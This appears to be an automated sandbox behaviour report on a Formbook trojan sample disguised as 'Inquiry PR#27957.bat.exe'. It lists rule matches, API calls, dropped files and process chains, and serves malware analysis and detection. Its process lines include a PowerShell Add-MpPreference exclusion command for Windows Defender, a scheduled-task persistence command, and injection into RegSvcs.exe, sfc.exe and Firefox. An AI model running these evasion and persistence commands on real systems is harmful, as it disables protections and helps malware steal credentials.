            Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.Inquiry PR#27957.bat.exe.7210000.4.raw.unpack, SizeParameters.cs; Large array initialization: array initializer size 15142
            Source: 0.2.Inquiry PR#27957.bat.exe.2f4b620.1.raw.unpack, SizeParameters.cs; Large array initialization: array initializer size 15142
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_0042BDB3 NtClose,9_2_0042BDB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662B60 NtClose,LdrInitializeThunk,9_2_01662B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01662DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01662C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_016635C0 NtCreateMutant,LdrInitializeThunk,9_2_016635C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01664340 NtSetContextThread,9_2_01664340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01664650 NtSuspendThread,9_2_01664650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662BE0 NtQueryValueKey,9_2_01662BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662BF0 NtAllocateVirtualMemory,9_2_01662BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662BA0 NtEnumerateValueKey,9_2_01662BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662B80 NtQueryInformationFile,9_2_01662B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662AF0 NtWriteFile,9_2_01662AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662AD0 NtReadFile,9_2_01662AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662AB0 NtWaitForSingleObject,9_2_01662AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662D30 NtUnmapViewOfSection,9_2_01662D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662D00 NtSetInformationFile,9_2_01662D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662D10 NtMapViewOfSection,9_2_01662D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662DD0 NtDelayExecution,9_2_01662DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662DB0 NtEnumerateKey,9_2_01662DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662C60 NtCreateKey,9_2_01662C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662C00 NtQueryInformationProcess,9_2_01662C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662CF0 NtOpenProcess,9_2_01662CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662CC0 NtQueryVirtualMemory,9_2_01662CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662CA0 NtQueryInformationToken,9_2_01662CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662F60 NtCreateProcessEx,9_2_01662F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662F30 NtCreateSection,9_2_01662F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662FE0 NtCreateFile,9_2_01662FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662FA0 NtQuerySection,9_2_01662FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662FB0 NtResumeThread,9_2_01662FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662F90 NtProtectVirtualMemory,9_2_01662F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662E30 NtWriteVirtualMemory,9_2_01662E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662EE0 NtQueueApcThread,9_2_01662EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662EA0 NtAdjustPrivilegesToken,9_2_01662EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01662E80 NtReadVirtualMemory,9_2_01662E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01663010 NtOpenDirectoryObject,9_2_01663010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01663090 NtSetValueKey,9_2_01663090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_016639B0 NtGetContextThread,9_2_016639B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01663D70 NtOpenThread,9_2_01663D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 9_2_01663D10 NtOpenProcessToken,9_2_01663D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011152A014_2_011152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112B2C014_2_0112B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112D2F014_2_0112D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0110146014_2_01101460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111349714_2_01113497
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011574E014_2_011574E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111B73014_2_0111B730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111995014_2_01119950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112B95014_2_0112B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0111599014_2_01115990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0117D80014_2_0117D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011138E014_2_011138E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112FB8014_2_0112FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01185BF014_2_01185BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114DBF914_2_0114DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01183A6C14_2_01183A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01113D4014_2_01113D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0112FDC014_2_0112FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01189C3214_2_01189C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01129C2014_2_01129C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01111F9214_2_01111F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01119EB014_2_01119EB0
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E3EDF116_2_03E3EDF1
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40BA616_2_03E40BA6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40B9D16_2_03E40B9D
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E5F2B616_2_03E5F2B6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4788616_2_03E47886
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4788216_2_03E47882
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E40DC616_2_03E40DC6
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E354B716_2_03E354B7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01677E54 appears 110 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0117EA12 appears 37 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 016AF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01665130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0161B970 appears 280 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01157E54 appears 97 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0169EA12 appears 86 times
            Source: Inquiry PR#27957.bat.exe, Static PE information: invalid certificate
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1351958774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCAA.dll4 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1374530515.0000000008D64000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1372644857.0000000007290000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1350638471.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1353264199.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, 00000000.00000000.1323414765.0000000000BB6000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, Binary or memory string: OriginalFilenamevVTR.exe( vs Inquiry PR#27957.bat.exe
            Source: Inquiry PR#27957.bat.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Inquiry PR#27957.bat.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: fuqwoDzun.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, b9060lgXpIuMEFTtMf.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, b9060lgXpIuMEFTtMf.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs, Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, b9060lgXpIuMEFTtMf.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@25/16@17/12
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, File created: C:\Users\user\AppData\Roaming\fuqwoDzun.exe
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, File created: C:\Users\user\AppData\Local\Temp\tmp2C94.tmp
            Source: Inquiry PR#27957.bat.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1956912870.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3786127793.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1956746019.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3786127793.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Inquiry PR#27957.bat.exe, ReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, File read: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe:Zone.Identifier
            Source: unknown, Process created: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: unknown, Process created: C:\Users\user\AppData\Roaming\fuqwoDzun.exe C:\Users\user\AppData\Roaming\fuqwoDzun.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe, Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe, Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: gpapi.dllJump to behavior
